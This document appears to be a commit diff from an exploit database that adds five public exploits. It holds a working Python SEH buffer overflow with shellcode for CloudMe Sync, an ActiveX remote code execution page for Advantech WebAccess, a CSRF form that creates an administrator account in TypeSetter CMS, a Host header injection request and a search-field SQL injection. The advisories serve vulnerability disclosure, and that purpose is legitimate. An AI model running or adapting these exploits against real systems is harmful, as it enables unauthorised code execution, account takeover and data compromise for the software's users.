DB: 2018-02-14

5 changes to exploits/shellcodes

CloudMe Sync < 1.11.0 - Buffer Overflow
Advantech WebAccess 8.3.0 - Remote Code Execution
TypeSetter CMS 5.1 - 'Host' Header Injection
TypeSetter CMS 5.1 - Cross-Site Request Forgery
News Website Script 2.0.4 - 'search' SQL Injection

exploits/php/webapps/44028.txt

@@ -0,0 +1,34 @@
+​# Exploit Title: TypeSetter CMS 5.1 Host Header Injection
+# Date: 10-02-2018
+# Exploit Author: Navina Asrani
+# Contact: https://twitter.com/NavinaSanjay
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://www.typesettercms.com/
+# Version: 5.1
+# CVE : NA
+# Category: Webapp CMS
+
+1. Description
+
+The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning
+
+    
+2. Proof of Concept
+
+1. Visit the application
+2. Tamper the request and change the host to any arbitrary header like google.com
+3. The same is added in request and complete page re-direction takes place.
+Exploitation Technique: A attacker can perform application modification to perform advanced attacks as as password reset/ cache poisoning etc.
+Severity Level: High
+Security Risk:
+The presence of such a risk can lead to user cache poisoning and user re-direction
+Exploit code:
+
+GET / HTTP/1.1
+Host: google.com
+
+You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/ 
+   
+3. Solution:
+   
+To Mitigate host header injections allows only a white-list of allowed host names.

exploits/php/webapps/44029.html

@@ -0,0 +1,40 @@
+# Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery
+# Date: 10-02-2018
+# Exploit Author: Navina Asrani
+# Contact: https://twitter.com/NavinaSanjay
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://www.typesettercms.com/
+# Version: 5.1
+# CVE : NA
+# Category: Webapp CMS
+
+1. Description
+
+The application allows malcious HTTP requests to be directly executed without any hidden security token.This may lead to user account takeover or malious command execution
+
+2. Proof of Concept
+
+Exploit code:
+
+<html>
+  <body>
+    <form action="http://localhost/cms/Admin/Users" method="POST">
+      <input type="hidden" name="verified" value="475f10871b08f44c20dab5bc2cb55d17946e6c98fa8abf28c64a5a9dab0ee2e122fefcc29cae9cc2e48daf564bfe55665e26b2b2174dee14e83c5e6974cf3218" />
+      <input type="hidden" name="username" value="samrat&#95;test" />
+      <input type="hidden" name="password" value="sam9318" />
+      <input type="hidden" name="password1" value="sam9318" />
+      <input type="hidden" name="algo" value="password&#95;hash" />
+      <input type="hidden" name="email" value="sam9318&#64;gmail&#46;com" />
+      <input type="hidden" name="grant&#95;all" value="all" />
+      <input type="hidden" name="cmd" value="newuser" />
+      <input type="hidden" name="aaa" value="Save" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+ 
+
+   
+3. Solution:
+
+To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens​

exploits/php/webapps/44030.txt

@@ -0,0 +1,23 @@
+##################################################################
+# Exploit Title:News Website Script - SQL Injection (Error Based)
+# Google Dork: NA
+# Date: 12.02.2018
+# Exploit Author: Varun Bagaria
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: *http://under24usd.com/demo/newstoday/index.php
+# Version: 2.0.4
+# Tested on: Windows 7
+# Category: Webapps
+# CVE : NA
+##################################################################
+
+Proof of Concept
+=================
+
+Attack Parameter : search
+Payload : '
+
+Reproduction Steps:
+------------------------------
+1. Access the script
+2. In the search bar insert ' and you will get error based SQL Injection

exploits/windows/remote/44027.py

@@ -0,0 +1,171 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
+[+] ISR: Apparition Security          
+[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669
+
+
+Vendor:
+=============
+www.cloudme.com
+
+
+Product:
+===========
+CloudMe Sync <= v1.10.9
+
+(CloudMe_1109.exe)
+hash: 0e83351dbf86562a70d1999df7674aa0 
+
+CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.
+It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.
+
+
+
+Vulnerability Type:
+===================
+Buffer Overflow
+
+
+
+CVE Reference:
+==============
+CVE-2018-6892
+
+
+
+Security Issue:
+================
+Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port 8888, can send a malicious payload causing
+a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC.
+
+CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)
+
+In Qt5Core:
+
+00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
+00564DF9   . 890424         MOV DWORD PTR SS:[ESP],EAX
+00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>;  Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst
+
+
+C:\>netstat -ano | findstr 8888
+TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       15504
+TCP    [::]:8888              [::]:0                 LISTENING       15504
+
+
+Buffer Overflow:
+================
+EIP register will be overwritten at about 1075 bytes.
+
+EAX 00000001
+ECX 76F698DA msvcrt.76F698DA
+EDX 00350000
+EBX 41414141
+ESP 0028D470
+EBP 41414141
+ESI 41414141
+EDI 41414141
+EIP 41414141
+
+Stack Dump:
+==========
+
+(508.524): Access violation - code c0000005 (first/second chance not available)
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
+eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
+eip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+41414141 ??              ???
+
+Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems.
+We will therefore use Structured Exceptional Handler overwrite for our exploit.
+
+e.g.
+
+6FE6909D  0x6fe6909d : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
+00476795  0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
+61E7B7F6  0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)
+
+
+0day Exploit POC:
+==============
+import socket,struct
+
+print 'CloudMe Sync v1.10.9'
+print 'Unauthenticated Remote Buffer Overflow 0day'
+print 'Discovery/credits: hyp3rlinx'
+print 'apparition security\n'
+
+
+#shellcode to pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+ip=raw_input('[+] CloudMe Target IP> ') 
+
+nseh="\xEB\x06"+"\x90"*2                #JMP
+seh=struct.pack('<L',0x61e7b7f6)        #POP,POP RET 
+junk="A"*2232+nseh+seh+sc+"B"*5600
+payload=junk+nseh+seh+sc
+
+def PwnMe(ip,payload):
+    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)        
+    s.connect((ip,8888))
+    s.send(payload)
+    print 'Sending buffer overflow packetz'
+    raw_input()
+
+
+if __name__ == '__main__':
+    PwnMe(ip,payload)
+
+
+
+References:
+============
+https://www.cloudme.com/en/sync#
+https://blogs.securiteam.com/index.php/archives/3669
+
+
+POC Video URL:
+=============
+https://vimeo.com/255280060
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline: 
+=============================
+SSD Vulnerability submission: January 17, 2018
+Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
+More details can be found on their blog at:
+
+https://blogs.securiteam.com/index.php/archives/3669
+February 11, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).

exploits/windows/remote/44031.html

@@ -0,0 +1,57 @@
+Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution
+
+Discovered by: Nassim Asrir 
+
+Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
+
+CVE: CVE-2018-6911
+
+Tested on: IE11 / Win10
+
+
+Technical Details:
+==================
+
+The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.
+
+Vulnerable File: C:\WebAccess\Node\AspVBObj.dll
+
+Vulnerable Function: VBWinExec
+
+Vulnerable Class: Include
+
+Class Include
+GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
+Number of Interfaces: 1
+Default Interface: _Include
+RegKey Safe for Script: False
+RegkeySafe for Init: False
+KillBitSet: False
+
+The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.
+
+Function VBWinExec (
+ 	ByRef command  As String 
+)
+
+Exploit:
+========
+
+<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
+<BODY>
+ <object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
+ 
+<SCRIPT>
+ 
+function exploit()
+ {
+     
+     rce.VBWinExec("calc")
+	
+   
+ }
+ 
+</SCRIPT>
+<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
+</body>
+</HTML>

files_exploits.csv

@@ -16013,6 +16013,8 @@ id,file,description,date,author,type,platform,port
 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
 44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
+44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows,
+44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -38032,6 +38034,9 @@ id,file,description,date,author,type,platform,port
 44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
 44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
 44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
+44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php,
+44029,exploits/php/webapps/44029.html,"TypeSetter CMS 5.1 - Cross-Site Request Forgery",2018-02-13,"Navina Asrani",webapps,php,
+44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80